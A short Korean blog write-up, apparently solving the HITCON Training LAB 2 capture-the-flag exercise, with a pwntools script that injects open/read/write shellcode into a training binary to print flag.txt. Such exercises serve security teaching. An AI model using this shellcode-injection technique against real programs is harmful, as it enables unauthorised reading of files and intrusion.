ii4gsp
HITCON Training - LAB 2 본문
orw.bin이란 파일을 ida로 열고 main함수를 보면 shellcode를 입력받는다.
pwntools를 사용하여 문제를 풀면된다.
from pwn import *
p = process("orw.bin")
payload = ""
payload += asm(shellcraft.open("./flag.txt"))
payload += asm(shellcraft.read("eax", "esp", 24))
payload += asm(shellcraft.write(1, "esp", 24))
p.recvuntil("shellcode: ")
p.sendline(payload)
p.interactive()
'시스템 해킹 > HITCON Training' 카테고리의 다른 글
HITCON Training - LAB 3 (2) | 2020.02.07 |
---|---|
HITCON Training - LAB 1 (0) | 2020.02.07 |
Comments